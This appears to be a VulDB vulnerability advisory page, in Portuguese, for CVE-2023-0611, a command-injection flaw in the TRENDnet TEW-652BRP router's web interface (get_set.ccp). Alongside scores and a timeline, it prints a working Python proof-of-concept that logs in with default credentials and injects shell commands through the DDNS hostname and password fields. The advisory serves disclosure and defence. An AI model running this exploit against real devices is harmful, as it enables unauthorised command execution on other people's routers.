TRENDnet TEW-652BRP 3.04B01 Web Management Interface get_set.ccp Elevação de Privilégios

CVSS Meta Pontuação TemporáriaPreço atual do exploit (≈)Nota de Interesse CTI
8.6$0-$5k0.00

Sumárioinformação

Uma vulnerabilidade foi encontrada em TRENDnet TEW-652BRP 3.04B01. Foi classificada como crítico. Afetado é uma função desconhecida do arquivo get_set.ccp do componente Web Management Interface. A manipulação com uma entrada desconhecida leva a Elevação de Privilégios. Esta vulnerabilidade é conhecida como CVE-2023-0611. É possível lançar o ataque remotamente. Além disso, existe um exploit disponível.

Detalhesinformação

Uma vulnerabilidade foi encontrada em TRENDnet TEW-652BRP 3.04B01. Foi classificada como crítico. Afetado é uma função desconhecida do arquivo get_set.ccp do componente Web Management Interface. A manipulação com uma entrada desconhecida leva a Elevação de Privilégios. Usar CWE para declarar o problema leva a CWE-77. A fraqueza foi publicada 01/02/2023.

Esta vulnerabilidade é conhecida como CVE-2023-0611. É possível lançar o ataque remotamente. Detalhes técnicos estão disponíveis. A popularidade desta vulnerabilidade está abaixo da média. Além disso, existe um exploit disponível. O exploit foi divulgado ao público e pode ser utilizado. Atualmente, o preço atual de um exploit pode ser aproximadamente USD $0-$5k no momento. A técnica de ataque utilizada por esta edição é T1202 de acordo com MITRE ATT&CK.

É declarado como prova de conceito. O exploit está compartilhado para download em vuldb.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k. O código usado pelo exploit é:

import requests,socket
import re
import time
from urllib.parse import urlencode


username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'


headers = {'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Origin': 'http://{}'.format(device_web_ip), 
'Connection': 'keep-alive', 
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 
'Upgrade-Insecure-Requests': '1'}


login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
  print('Login wrong, please retry!')
  exit()


params = {
'ccp_act': 'set', 
'ccpSubEvent': 'CCP_SUB_DDNS', 
'nextPage': 'ddns.htm', 
'ddnsCfg_DDNSEnable_1.1.0.0.0': 1, 
'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com', 
'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip), 
'ddnsCfg_Username_1.1.0.0.0': 'admin', 
'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip), 
'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)


try:
  r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
  pass

Produtoinformação

Fabricante

Nome

Versão

Licença

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 8.8
VulDB Meta Pontuação Temporária: 8.6

VulDB Pontuação Base: 8.8
VulDB Pontuação Temporária: 8.3
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

NVD Pontuação Base: 8.8
NVD Vetor: 🔍

CNA Pontuação Base: 8.8
CNA Vetor (VulDB): 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍

NVD Pontuação Base: 🔍

Exploraçãoinformação

Classe: Elevação de Privilégios
CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

Físico: Não
Local: Não
Remoto: Sim

Disponibilidade: 🔍
Acesso: Público
Estado: Prova de conceito
Linguagem de programação: 🔍
Descarregar: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Tendência de preços: 🔍
Estimativa de preço atual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Inteligência de ameaçasinformação

Interesse: 🔍
Atores ativos: 🔍
Grupos APT ativos: 🔍

Contramedidasinformação

Recomendação: nenhuma medida conhecida
Estado: 🔍

Tempo 0-dia: 🔍

Linha do tempoinformação

01/02/2023 🔍
01/02/2023 +0 dias 🔍
01/02/2023 +0 dias 🔍
01/03/2023 +28 dias 🔍

Fontesinformação

Estado: Confirmado

CVE: CVE-2023-0611 (🔍)
GCVE (CVE): GCVE-0-2023-0611
GCVE (VulDB): GCVE-100-219935
scip Labs: https://www.scip.ch/en/?labs.20161013

Entradainformação

Criado: 01/02/2023 14h28
Atualizado: 01/03/2023 11h09
Ajustamentos: 01/02/2023 14h28 (39), 01/02/2023 14h29 (2), 01/03/2023 11h04 (2), 01/03/2023 11h09 (27)
Completo: 🔍
Submissor: leetsun
Cache ID: 216::103

Submeterinformação

Aceite

  • Submeter #77380: Command injection on TRENDnet router TEW-652BRP(2) (de leetsun)

Be aware that VulDB is the high quality source for vulnerability data.

Discussão

Ainda sem comentários. Idiomas: pt + es + en.

Por favor, inicie sessão para comentar.

VoltarVisão GeralPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!